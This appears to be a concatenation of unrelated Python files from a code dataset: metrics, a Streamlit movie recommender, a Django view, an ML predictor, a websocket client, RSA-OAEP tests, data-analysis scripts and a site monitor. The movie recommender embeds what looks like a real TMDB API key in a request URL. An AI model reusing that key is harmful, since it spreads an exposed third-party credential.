\"%04d-%02d-%02d %d:%d:%d:%d\" % (\n self.year, \n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.fraction)\n\n\n","repo_name":"asierra01/ibm_db_test","sub_path":"cli_test_cases/DB2_TIMESTAMP.py","file_name":"DB2_TIMESTAMP.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34829091112","text":"import numpy as np\n\n\ndef cos_similarity(a, b):\n \"\"\"\n Calculate cosine similarity between input vectors\n\n :param a:\n :param b:\n :return: cosine similarity input vectors\n \"\"\"\n if len(a.shape) != len(b.shape):\n raise Exception('Input shapes must be the same')\n if not np.equal(a.shape, b.shape):\n raise Exception('Input shapes must be the same')\n\n return np.dot(a, b)/(np.linalg.norm(a) * np.linalg.norm(b))\n\n\ndef euclid_similarity(a, b):\n \"\"\"\n\n :param a:\n :param b:\n :return:\n \"\"\"\n if len(a.shape) != len(b.shape):\n raise Exception('Input shapes must be the same')\n if not np.equal(a.shape, b.shape):\n raise Exception('Input shapes must be the same')\n\n return 1 / np.sqrt(np.sum((a-b)**2))\n\n\ndef calc_eer(targ_scores, imp_scores):\n min_score = np.minimum(np.min(targ_scores), np.min(imp_scores))\n max_score = np.maximum(np.max(targ_scores), np.max(imp_scores))\n\n n_targs = len(targ_scores)\n n_imps = len(imp_scores)\n\n num_points = 50\n fa = np.zeros((num_points,))\n fr = np.zeros((num_points,))\n\n thrs = np.linspace(min_score, max_score, num_points)\n\n min_gap = float('inf')\n eer = 0\n\n for i, thr in enumerate(thrs):\n cur_fa = len(np.where(imp_scores > thr)[0]) / n_imps\n cur_fr = len(np.where(targ_scores < thr)[0]) / n_targs\n fa[i] = cur_fa\n fr[i] = cur_fr\n gap = np.abs(cur_fa - cur_fr)\n if gap < min_gap:\n min_gap = gap\n eer = (cur_fa + cur_fr) / 2\n\n return eer, fa, fr, thrs\n","repo_name":"Ananaskelly/TPE","sub_path":"core/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2847777888","text":"import streamlit as st\nimport pickle\nimport pandas as pd\nimport requests\n\npage_bg_img = '''\n\n'''\nst.markdown(page_bg_img, unsafe_allow_html=True)\n\ndef fetch_poster(movie_id):\n response = requests.get(\"https://api.themoviedb.org/3/movie/{}?api_key=1dc95ecd8b14bc6f208b290e6fa18d62&language=en-US\".format(movie_id))\n data = response.json()\n return \"https://image.tmdb.org/t/p/w500/\" + data['poster_path']\n\n\ndef recommend(movie):\n movie_index = movies[movies['title'] == movie].index[0]\n distances = similarity[movie_index]\n movies_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n recommended_movies = []\n recommended_movies_poster = []\n for i in movies_list:\n movie_id = movies.iloc[i[0]].movie_id\n recommended_movies.append(movies.iloc[i[0]].title)\n # fetch poster from API\n recommended_movies_poster.append(fetch_poster(movie_id))\n return recommended_movies, recommended_movies_poster\n\n\nmovies_dict = pickle.load(open('movie_dict.pkl', 'rb'))\nmovies = pd.DataFrame(movies_dict)\nsimilarity = pickle.load(open('similarity.pkl', 'rb'))\n\n\nst.title('FilmFinder: Navigating the Movie Universe')\n\nselected_movie_name = st.selectbox(\n 'How would you like to be contacted?',\n movies['title'].values)\n\n\nif st.button('Recommend'):\n names, posters = recommend(selected_movie_name)\n col1, col2, col3, col4, col5 = st.columns(5)\n\n with col1:\n st.text(names[0])\n st.image(posters[0])\n\n with col2:\n st.text(names[1])\n st.image(posters[1])\n\n with col3:\n st.text(names[2])\n st.image(posters[2])\n\n with col4:\n st.text(names[3])\n st.image(posters[3])\n\n with col5:\n st.text(names[4])\n st.image(posters[4])\n\n\n","repo_name":"afsalbadarudeen/Movie_recommender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25424062837","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Agent, Customer, Delivery\n# Create your views here.\n\n\n#basic version\n#def index(request):\n# return render(request, 'agentportal/index.html')\n\n#def index(request):\n\t\n#\tagentName= \"Agent1\"\n#\tagentName=request.POST['agentName']\n#\tselectedAgent=Agent.objects.get(name=agentName)\n#\tnameAddressList=[]\n\n#\tfor delivery in Delivery.objects.filter(agent=selectedAgent):\n#\t\tnameAddressList.append({'name':delivery.customer.name, 'address':delivery.customer.address})\n\n#:set\treturn render(request, 'agentportal/index.html', {'nameAddressList':nameAddressList})\n\ndef index(request):\n\tagentName= \"Agent1\"\n\tselectedAgent=Agent.objects.get(name=agentName)\n\tnameAddressList=[]\n\t\n\tfor delivery in Delivery.objects.filter(agent=selectedAgent):\n\t\tnameAddressList.append({'name':delivery.customer.name, 'address':delivery.customer.address})\n\t\n\treturn render(request, 'agentportal/index.html', {'nameAddressList':nameAddressList})\n\n","repo_name":"space-apes/EasyNews","sub_path":"news/agentportal/viewsBACKUP.py","file_name":"viewsBACKUP.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360252227","text":"import pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass XGBRegressionService:\r\n\r\n def __init__(self):\r\n if not os.path.exists('guess_estate_price/services/model.pkl'):\r\n raise Exception\r\n self.__reg_model = pickle.load(open('guess_estate_price/services/model.pkl', 'rb'))\r\n\r\n def make_prediction(self, *args, _import=False):\r\n if not _import:\r\n input_data = np.array(args)\r\n pred = self.__reg_model.predict(input_data)\r\n else:\r\n pred = []\r\n for data in args:\r\n input_data = np.array(data)\r\n pred.append(self.__reg_model.predict(input_data))\r\n return pred\r\n\r\n\r\ndef predict(form):\r\n excl = 'csrfmiddlewaretoken'\r\n\r\n data = [float(form[param]) for param in form if param not in excl]\r\n return XGBRegressionService().make_prediction(data)\r\n\r\n\r\ndef predict_csv(file):\r\n _params = [\r\n 'city_id',\r\n 'district_id',\r\n 'street_id',\r\n 'floors_cnt',\r\n 'rooms_cnt',\r\n 'building_year',\r\n 'area_total',\r\n 'area_kitchen',\r\n 'series_id'\r\n ]\r\n csv = pd.read_csv(file)\r\n X = csv[_params]\r\n X = X.fillna(-1)\r\n\r\n return XGBRegressionService().make_prediction(X, _import=True)\r\n","repo_name":"anshmain/esoft_test","sub_path":"guess_estate_price/services/ml_predict.py","file_name":"ml_predict.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73432793491","text":"\"\"\" WSClient\"\"\"\n\n\nimport websocket\nimport gzip\nimport threading\nimport json\nimport pygame\nimport uuid\nimport traceback\n\n\ndef sync(func):\n def wrapper(self, data, call_back):\n rand = str(uuid.uuid4())\n self.call_backs[rand] = call_back\n return func(self, data, rand)\n\n return wrapper\n\n\nclass WSClient(threading.Thread):\n def __init__(self, field, url='ws://92.63.105.60:8000', debug=True):\n threading.Thread.__init__(self, target=self.run)\n self.name = \"Websocket client\"\n self.field = field\n self.url = url\n self.ws_connection = websocket.WebSocketApp(\n self.url,\n on_message=self.on_message,\n on_open=lambda x: print('Start'),\n on_close=self.on_close\n )\n self.ws_connection.keep_running = True\n if debug:\n self.ws_connection._callback = self.debug_callback\n self.start()\n self.ws_connection._callback = self.debug_callback\n self.call_backs = {}\n\n def send_message(self, data):\n \"\"\"\n Send message\n :param data: dict\n :return: None\n \"\"\"\n data = json.dumps(data)\n self.ws_connection.send(gzip.compress(data.encode('utf-8')), 2)\n\n def on_message(self, _, data):\n data = gzip.decompress(data)\n msg = json.loads(data.decode('utf-8'))\n typ = msg['type']\n data = msg['data']\n if msg.get('id'):\n self.call_backs[msg['id']](data)\n self.call_backs.pop(msg['id'])\n return\n if typ == 'auth_ok':\n with open('.cookie', 'w') as o:\n o.write(data['session'])\n elif typ == 'tick':\n self.field.update(data)\n elif typ == 'image':\n s = pygame.image.fromstring(data['src'], data['size'], 'RGBA')\n pygame.image.save(s, 'sprites/' + data['name'])\n else:\n pass\n\n def on_close(self, _):\n self.ws_connection.keep_running = False\n\n def action(self, action_type, data=''):\n self.send_message({'action': action_type, 'data': data})\n\n def auth(self, user, password, call_back):\n rand = str(uuid.uuid4())\n self.call_backs[rand] = call_back\n self.send_message({'type': 'auth', 'data': {'user': user, 'password': password, 'id': rand}})\n\n def run(self):\n self.ws_connection.run_forever()\n\n @sync\n def session_auth(self, session, func):\n self.send_message({'type': 'session_auth', 'data': {'session': session}, 'id': func})\n\n @sync\n def get_image(self, data, func):\n self.send_message({'type': 'get_image', 'data': data, 'id': func})\n\n def debug_callback(self, callback, *args):\n if callback:\n try:\n callback(self, *args)\n except:\n traceback.print_exc()","repo_name":"danya02/pygame-mmorpg","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14943263722","text":"from pkcs1 import rsaes_oaep\n\nimport data\n\noaep_int_data = data.OaepIntData()\noaep_vect_data = data.OaepVectData()\n\n\ndef test_oaep_int_encryption():\n data = oaep_int_data\n encrypted = rsaes_oaep.encrypt(data.public_key, data.message, seed=data.seed)\n assert data.encrypted == encrypted\n\n\ndef test_oaep_int_decryption():\n data = oaep_int_data\n message = rsaes_oaep.decrypt(data.private_key, data.encrypted)\n assert data.message == message\n\n\ndef test_oaep_vect_encryption():\n data = oaep_vect_data\n for example in data.examples:\n public_key = example.public_key\n for sample in example.samples:\n encrypted = rsaes_oaep.encrypt(public_key, sample.message, seed=sample.seed)\n assert sample.encrypted == encrypted\n\n\ndef test_oaep_vect_decryption():\n data = oaep_vect_data\n for example in data.examples:\n private_key = example.private_key\n for sample in example.samples:\n message = rsaes_oaep.decrypt(private_key, sample.encrypted)\n assert sample.message == message\n","repo_name":"bdauvergne/python-pkcs1","sub_path":"tests/test_rsaes_oaep.py","file_name":"test_rsaes_oaep.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"66"} +{"seq_id":"21741348402","text":"from models import UserProfile,UserCreditEarningHistory\n\ndef add_user_credit_earning(user,description,amount):\n # update credit\n profile=UserProfile.objects.get(user=user)\n profile.credit=profile.credit+amount\n profile.save()\n # add history\n UserCreditEarningHistory.objects.create(\n user = profile,\n description=description,\n amount=amount,\n )","repo_name":"MarkusZhang/eventmgr","sub_path":"account/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32575479420","text":"# Import libraries\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Set the file paths\nroot_folder_path = \"C:/Users/Matthew/Dropbox/Personal/School/JHU/Ethics/Project\"\nresults_folder_path = root_folder_path + \"/Data/Results\"\nanalysis_folder_path = root_folder_path + \"/Data/Analysis\"\n\n# Create an empty data frame\ndata = pd.DataFrame()\n\n# Get the results files\nresults_file_names = []\nfor results_file_name in os.listdir(results_folder_path):\n if results_file_name.endswith(\".csv\"):\n results_file_names.append(results_file_name)\n\n# Loop through the results files\nfor results_file_name in results_file_names:\n\n # Get the file path\n results_file_path = results_folder_path + \"/\" + results_file_name\n\n # Read the data\n data_to_append = pd.read_csv(results_file_path)\n\n # Get the model and treatment\n model_name_parts = results_file_name.split(\"-\")[0:-1]\n model_name = \"-\".join(model_name_parts)\n treatment = results_file_name.split(\"-\")[-1].split(\".\")[0]\n\n # Insert the model and treatment\n data_to_append.insert(0, \"Model\", model_name)\n data_to_append.insert(1, \"Treatment\", treatment)\n\n # Append the data\n data = data._append(data_to_append, ignore_index=True)\n\n# Copy the data\ndata_to_summarize = data.copy()\n\n# Remove the case_id column\ndata_to_summarize = data_to_summarize.drop(columns=['case_id'])\n\n# Rename \"id\" column\ndata_to_summarize = data_to_summarize.rename(columns={\"id\": \"case_id\"})\n\n# Group the data by 'Model' and 'Treatment'\ngrouped_data = data_to_summarize.groupby(['Model', 'Treatment'])\n\n# Define unique_values\nunique_values = [-1, 0, 1]\n\n# Create an empty list to store the aggregated data\nsummary_data = []\n\n# Loop through each group and count correctness values\nfor (model, treatment), group in grouped_data:\n for value in unique_values:\n value_counts = (group == value).sum()\n row = {'Value': value, 'Model': model, 'Treatment': treatment, **value_counts.to_dict()}\n row[\"Model\"] = model\n row[\"Treatment\"] = treatment\n summary_data.append(row)\n\n# Create a summary DataFrame from the aggregated data\nsummary = pd.DataFrame(summary_data)\n\n# Move Value to the third column\ncols = summary.columns.tolist()\ncols = cols[1:3] + cols[0:1] + cols[3:-1]\nsummary = summary[cols]\n\n# Create a new table for the total counts\ntotal_counts = summary\\\n .set_index([\"Model\", \"Treatment\", \"Value\"])\\\n .sum(axis=1)\\\n .reset_index(name='Total')\n\n# Display the total counts\nprint(total_counts)\n\n# Concatenate Model, Treatment, and Value with a hyphen\ntotal_counts['ID'] = total_counts['Model'] + \"-\" + total_counts['Treatment']\n\n# Create a new table for the final results\nfinal_results = pd.DataFrame()\n\n# For each ID, get the correct, neutral, and incorrect totals\nfor id, group in total_counts.groupby('ID'):\n correct_total = group[group['Value'] == 1]['Total'].sum()\n neutral_total = group[group['Value'] == 0]['Total'].sum()\n incorrect_total = group[group['Value'] == -1]['Total'].sum()\n print(f\"{id}: {correct_total}, {neutral_total}, {incorrect_total}\")\n\n # Add correct and neutral totals\n correct_and_neutral_total = correct_total + neutral_total\n\n # Compute accuracy\n accuracy = correct_and_neutral_total / (correct_total + neutral_total + incorrect_total)\n\n # Create a new row for the final results table\n row = {\n 'ID': id,\n 'Correct': correct_total,\n 'Neutral': neutral_total,\n 'Incorrect': incorrect_total,\n 'Accuracy': accuracy}\n\n # Add the results to the final results table\n final_results = final_results._append(row, ignore_index=True)\n\n # Display the accuracy\n print(f\"{id}: {accuracy:.4}\")\n print()\n\n# Display a bar chart of the final results\nfinal_results.plot.bar(\n x='ID',\n y='Accuracy',\n figsize=(10, 5))\nplt.ylim(0.0, 1.0)\nplt.title('Accuracy by Model')\nplt.xlabel('Model')\nplt.ylabel('Accuracy')\nplt.xticks(rotation=15, ha='right')\nplt.subplots_adjust(bottom=0.2)\nplt.gca().get_legend().remove()\n\n# Add labels to the bars\nfor index, row in final_results.iterrows():\n plt.text(\n x=index,\n y=row['Accuracy'] - 0.05,\n s=f\"{row['Accuracy']:.3f}\",\n ha='center',\n color='white',)\n\n# Save the plot as an SVG file\naccuracy_svg_file_path = analysis_folder_path + \"/SVG/\" + \"accuracy-by-model.svg\"\nplt.savefig(accuracy_svg_file_path, bbox_inches=\"tight\")\n\n# Save the plot as a PNG file\naccuracy_png_file_path = analysis_folder_path + \"/PNG/\" + \"accuracy-by-model.png\"\nplt.savefig(accuracy_png_file_path, bbox_inches=\"tight\", dpi=300)\n\n# Save the data to a CSV file\naccuracy_csv_file_path = analysis_folder_path + \"/CSV/\" + \"accuracy-by-model.csv\"\nfinal_results.to_csv(accuracy_csv_file_path, index=False)\n\n# Display the plot\nplt.show()\n\n# Copy the data\ndata_to_summarize = data.copy()\n\n# Make zero values positive cases (i.e. correct predictions)\ndata_to_summarize = data_to_summarize.replace(0, 1)\n\n# Make negative values negative cases (i.e. incorrect predictions)\ndata_to_summarize = data_to_summarize.replace(-1, 0)\n\n# Remove the case_id column (needed to make aggregation work)\ndata_to_summarize = data_to_summarize.drop(columns=['case_id'])\ndata_to_summarize = data_to_summarize.rename(columns={\"id\": \"case_id\"})\n\n# Aggregate the details data\ngrouped_data = data_to_summarize.groupby(['Model', 'Treatment'])\ndetails_data = pd.DataFrame()\nfor (model, treatment), group in grouped_data:\n numeric_group = group.select_dtypes(include='number')\n row = {'Model': model, 'Treatment': treatment, **numeric_group.mean().to_dict()}\n details_data = details_data._append(row, ignore_index=True)\n\n# For each model-treatment, plot the accuracy of all columns as a separate bar chart\nfor (model, treatment), group in details_data.groupby(['Model', 'Treatment']):\n group = group.drop(columns=['Model', 'Treatment'])\n group = group.iloc[0].transpose().to_frame()\n group.plot.barh(\n legend=False,\n figsize=(10, 5))\n plt.title(f\"{model} - {treatment}\")\n plt.xlabel('Accuracy')\n plt.ylabel('Feature')\n plt.gca().invert_yaxis()\n plt.yticks(fontsize=8)\n plt.xticks(rotation=15, ha='right')\n plt.subplots_adjust(left=0.25)\n\n # Save the plot as an SVG file\n details_svg_file_path = analysis_folder_path + \"/SVG/\" + f\"{model}-{treatment}-details.svg\"\n plt.savefig(details_svg_file_path, bbox_inches=\"tight\")\n\n # Save the plot as a PNG file\n details_png_file_path = analysis_folder_path + \"/PNG/\" + f\"{model}-{treatment}-details.png\"\n plt.savefig(details_png_file_path, bbox_inches=\"tight\", dpi=300)\n\n # Save the data to a CSV file\n details_csv_file_path = analysis_folder_path + \"/CSV/\" + f\"{model}-{treatment}-details.csv\"\n final_results.to_csv(details_csv_file_path, index=False)\n\n # Display the plot\n plt.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"matthewrenze/jhu-ai-ethics-final-project","sub_path":"Code/Analyze/analyze_accuracy.py","file_name":"analyze_accuracy.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27323305460","text":"import numpy as np\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nimport nltk\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nimport random\n\nkeep_words = ['NNS', 'NN', 'NNP', 'NNPS', 'CC', 'IN']\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\n\ndef create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n\ndef text_processor(data_path, data_name, title_max_len, abstract_max_len, vocab_level, processed_path):\n samples = []\n dir_path = data_path\n queries = []\n\n if not tf.gfile.Exists(processed_path):\n tf.gfile.MakeDirs(processed_path)\n\n with tf.gfile.Open(dir_path + \"/\" + data_name + \".txt\") as f:\n for line in f:\n line = line.lower()\n samples.append(str.encode(line[:-1]))\n\n with tf.gfile.Open(dir_path + \"/\" + data_name + \"_query.txt\") as f:\n for line in f:\n line = line.lower()\n queries.append(str.encode(line[:-1]))\n\n # Also pad the prediction titles and abstracts with dummies\n dummy_abstracts = [data_name] * len(queries)\n dummy_titles = [data_name] * len(queries)\n\n if not tf.gfile.Exists(processed_path + \"/\" + data_name + \".subwords\"):\n print(\"Vocab file does not exist, making a new one.\")\n tokenizer = get_tokenizer(samples, vocab_level)\n tokenizer.save_to_file(processed_path + \"/\" + data_name)\n else:\n print(\"Found an existing vocab file, using this one.\")\n tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file(processed_path + \"/\" + data_name)\n\n vocab_size = tokenizer.vocab_size + 2\n\n # Create separate lists for abstracts and title\n titles = []\n\n num_papers = len(samples) / 2\n currentIndex = 0\n\n # print(\"separating titles from abstracts\")\n while currentIndex < num_papers:\n titles.append(samples.pop(currentIndex))\n currentIndex += 1\n\n abstracts = samples\n\n abstracts, titles = shuffle(abstracts, titles)\n dummy_queries = [\"dummy query\"] * len(abstracts)\n\n augmented_queries = []\n augmented_abstracts = []\n augmented_titles = []\n\n # Augment the data\n for i in range(len(titles)):\n new_queries = get_simpler_titles(titles[i])\n new_abstracts = [abstracts[i]] * len(new_queries)\n new_titles = [titles[i]] * len(new_queries)\n augmented_queries += new_queries\n augmented_abstracts += new_abstracts\n augmented_titles += new_titles\n\n train_abstracts, train_titles, train_queries = shuffle(augmented_abstracts[:-10000], augmented_titles[:-10000], augmented_queries[:-10000])\n\n def encode(sample):\n \"\"\"Turns an abstract in English into BPE (Byte Pair Encoding).\n Adds start and end token to the abstract.\n\n Keyword arguments:\n abstract -- the abstract (type: bytes)\n \"\"\"\n\n encoded_sample = [tokenizer.vocab_size] + tokenizer.encode(sample) + [tokenizer.vocab_size + 1]\n\n return encoded_sample\n\n # abstract_lengths = [0] * 1000\n # title_lengths = [0] * 200\n\n def write_tfrecords(titles, abstracts, queries, data_name):\n full_path = processed_path + \"/\" + data_name + \".tfrecords\"\n if not tf.gfile.Exists(full_path):\n\n writer = tf.io.TFRecordWriter(full_path)\n counter = 0\n\n for title, abstract, query in zip(titles, abstracts, queries):\n if counter % 1000 == 0:\n print(\"Number of examples written to tfrecord: \" + str(counter))\n counter += 1\n encoded_title = encode(title)\n encoded_abstract = encode(abstract)\n encoded_query = encode(query)\n\n if len(encoded_abstract) <= abstract_max_len and len(encoded_title) <= title_max_len:\n # abstract_lengths[len(encoded_abstract)] += 1\n # title_lengths[len(encoded_title)] += 1\n\n title_length = len(encoded_title)\n padding = title_max_len - title_length\n if padding >= 0:\n title_feature = np.pad(encoded_title, (0, padding), 'constant')\n\n abstract_length = len(encoded_abstract)\n padding = abstract_max_len - abstract_length\n if padding >= 0:\n abstract_feature = np.pad(encoded_abstract, (0, padding), 'constant')\n\n query_length = len(encoded_query)\n padding = title_max_len - query_length\n if padding >= 0:\n query_feature = np.pad(encoded_query, (0, padding), 'constant')\n\n example = {}\n example[\"abstracts\"] = create_int_feature(abstract_feature)\n example[\"titles\"] = create_int_feature(title_feature)\n example[\"queries\"] = create_int_feature(query_feature)\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=example))\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n write_tfrecords(train_titles, train_abstracts, train_queries, \"training\")\n write_tfrecords(augmented_titles[-10000:], augmented_abstracts[-10000:], augmented_queries[-10000:], \"testing\")\n write_tfrecords(titles, abstracts, dummy_queries, \"original\")\n write_tfrecords(dummy_titles, dummy_abstracts, queries, \"query\")\n\n # # Get the distribution on the length of each fact in tokens\n # print(\"abstract_lengths: \")\n # for i, length in enumerate(abstract_lengths):\n # print(str(i) + \": \" + str(length))\n #\n # print(\"title_lengths: \")\n # for i, length in enumerate(title_lengths):\n # print(str(i) + \": \" + str(length))\n\n return vocab_size, tokenizer\n\n\ndef get_tokenizer(texts, vocab_level):\n input_vocab_size = 2 ** vocab_level\n\n # Create a BPE vocabulary using the abstracts\n\n return tfds.features.text.SubwordTextEncoder.build_from_corpus(\n texts, target_vocab_size=input_vocab_size)\n\ndef get_simpler_titles(title):\n tokens = nltk.word_tokenize(title.decode())\n tagged_tokens = nltk.pos_tag(tokens)\n non_noun_tokens = [i for i in range(len(tagged_tokens)) if tagged_tokens[i][1] not in keep_words]\n pop_list = []\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.2])\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.5])\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.8])\n\n new_titles = [title]\n\n for pop in pop_list:\n new_title = TreebankWordDetokenizer().detokenize([tokens[i] for i in range(len(tokens)) if i not in pop])\n if new_title not in new_titles and new_title != title:\n new_titles.append(str.encode(new_title))\n\n return new_titles","repo_name":"TianrenWang/NeuralMatcher","sub_path":"text_processor.py","file_name":"text_processor.py","file_ext":"py","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42817842725","text":"import requests\nimport time\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\n\nOK_TEXT = \"\\033[92mOK\\033[0m\"\nCHANGED_TEXT = \"\\033[93mCHANGED\\033[0m\"\nERROR_TEXT = \"\\033[91mERROR\\033[0m\"\nSEPARATOR_TEXT = '-' * 30 + '\\n'\n\n\ndef get_parsed_webpage(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n return soup\n\n\ndef log(level, msg):\n now = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n level = level.lower()\n if level == 'ok':\n print(f\"{now} - [{OK_TEXT}] - {msg}\")\n elif level == 'changed':\n print(f\"{now} - [{CHANGED_TEXT}] - {msg}\")\n elif level == 'error':\n print(f\"{now} - [{ERROR_TEXT}] - {msg}\")\n\n\ndef monitoring_loop(urls, cooldown):\n try:\n # First check\n print(\"\\nPierwsze sprawdzenie...\\n\")\n last_content = {}\n webpage_responses = {}\n for url in urls:\n # Add url entry to responses dict\n webpage_responses[url] = {'ok': 0, 'changed': 0, 'error': 0}\n\n # Fetch webpage\n try: \n last_content[url] = get_parsed_webpage(url)\n\n # Error\n except:\n urls.remove(url)\n log('error', url)\n webpage_responses[url]['error'] += 1\n continue\n\n # Ok\n log('ok', url)\n webpage_responses[url]['ok'] += 1\n print(SEPARATOR_TEXT)\n time.sleep(cooldown)\n\n # Monitoring loop\n turn = 1\n while True:\n print(f\"Tura: {turn}\\n\")\n for url in urls:\n # Fetch webpage\n try:\n soup = get_parsed_webpage(url)\n\n # Error\n except:\n log('error', url)\n webpage_responses[url]['error'] += 1\n continue\n\n # Changed\n if soup != last_content[url]:\n log('changed', url)\n webpage_responses[url]['changed'] += 1\n diff = [i.strip() for i in soup if i not in last_content[url]]\n for i in diff:\n print(i)\n\n # Ok\n else:\n log('ok', url)\n webpage_responses[url]['ok'] += 1\n\n # Update last content\n last_content[url] = soup\n print(SEPARATOR_TEXT)\n turn += 1\n time.sleep(cooldown)\n\n # Print summary on exit\n except KeyboardInterrupt:\n print(\"\\n\\nMonitoring zakończony. Podsumowanie:\\n\")\n for url in webpage_responses:\n print(f\"{url} - {OK_TEXT}: {webpage_responses[url]['ok']}, {CHANGED_TEXT}: {webpage_responses[url]['changed']}, {ERROR_TEXT}: {webpage_responses[url]['error']}\")\n print()\n\n\ndef main():\n # Set cooldown\n cooldown = input('Podaj cooldown monitoringu w sekundach (60): ')\n if cooldown == '':\n cooldown = 60\n else:\n cooldown = int(cooldown)\n \n\n # Get urls from file\n with open('urls.txt', 'r') as f:\n urls = [line.strip() for line in f]\n\n # Run monitoring\n monitoring_loop(urls, cooldown)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mkalitka/studies","sub_path":"krjp/lista6/z2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37237047669","text":"\ntc = int(input())\n\nfor i in range(1, tc+1):\n isov = False\n n = float(input())\n ans = []\n while(1): # 실수 2진수로 변환\n n = n*2\n ans.append(int(n//1))\n if n%1==0:\n break;\n if len(ans) >= 13:\n isov=True\n n-=n//1\n print(\"#\"+str(i),end=\" \")\n print(\"\".join(map(str, ans)) if not isov else \"overflow\")\n \n \n\n'''\n입력\n3\n0.625\n0.1\n0.125\n\n출력\n#1 101\n#2 overflow\n#3 001\t \n'''","repo_name":"yejipractice/PS_Practice","sub_path":"SW_EXPERT/Advanced_Learn/이진수2.py","file_name":"이진수2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8448804793","text":"from odoo import Command\nfrom odoo.tests import tagged\n\nfrom odoo.addons.project.tests.test_project_sharing import TestProjectSharingCommon\nfrom odoo.addons.sale_timesheet.tests.common import TestCommonSaleTimesheet\n\n@tagged('post_install', '-at_install')\nclass TestSaleTimesheetPortal(TestProjectSharingCommon, TestCommonSaleTimesheet):\n\n def test_ensure_allowed_so_line_field_access(self):\n \"\"\" Ensure that the field so_line of account.analytic.line is accessible for portal user\"\"\"\n # A portal collaborator is added to a project to enable the rule analytic.account.analytic.line.timesheet.portal.user\n self.project_task_rate.write({\n 'collaborator_ids': [\n Command.create({'partner_id': self.user_portal.partner_id.id}),\n ],\n 'privacy_visibility': 'portal',\n 'message_partner_ids': [\n Command.link(self.user_portal.partner_id.id),\n ],\n })\n task1 = self.env['project.task'].create({\n 'name': 'Test Task',\n 'project_id': self.project_task_rate.id,\n })\n # log some timesheets (on the project accessible in portal)\n timesheet1 = self.env['account.analytic.line'].create({\n 'name': 'Test Line',\n 'project_id': self.project_task_rate.id,\n 'task_id': task1.id,\n 'unit_amount': 10.5,\n 'employee_id': self.employee_user.id,\n })\n # Accessing field allowed_so_line_ids as a portal user should not raise any access error\n self.env.invalidate_all()\n timesheet1.with_user(self.user_portal).read(['allowed_so_line_ids'])\n","repo_name":"Vauxoo/odoo","sub_path":"addons/sale_timesheet/tests/test_sale_timesheet_portal.py","file_name":"test_sale_timesheet_portal.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"9541431750","text":"import json\nimport os\nimport os.path\nfrom shutil import copyfile, rmtree\nimport subprocess\nimport sys\nfrom time import sleep\n\nOUTPUT_DIR = './output'\nGAMES_DOCS_DIR = './games'\n\ndef run(command, ignore_errors=False, **kwargs):\n error_code = subprocess.call([command], shell=True, **kwargs)\n if not ignore_errors and error_code != 0: # an error happened\n print('unexpected error')\n sys.exit(error_code)\n return error_code\n\ndef ensure_clean_dir(dirs):\n if os.path.isdir(dirs):\n rmtree(dirs)\n os.makedirs(dirs)\n\ndef github_link_to(game_name):\n return 'https://github.com/siggame/Cadre/blob/master/Games/{}/'.format(game_name)\n\ndef package_link_to(game_name):\n return 'pkg/joueur/games/{}/index.html'.format(game_name.lower())\n\ndef replace_pkg_links(s):\n return s.replace(\"pkg.1\", \"\")\n\ndef template_collapsible_section(header, contents):\n return \"\"\"\n
\n\t
\n\t\t

{header} ▹

\n\t
\n\t
\n\t\t

{header} ▾

\n\t\t
\n\t\t\t{contents}\n\t\t
\n\t
\n
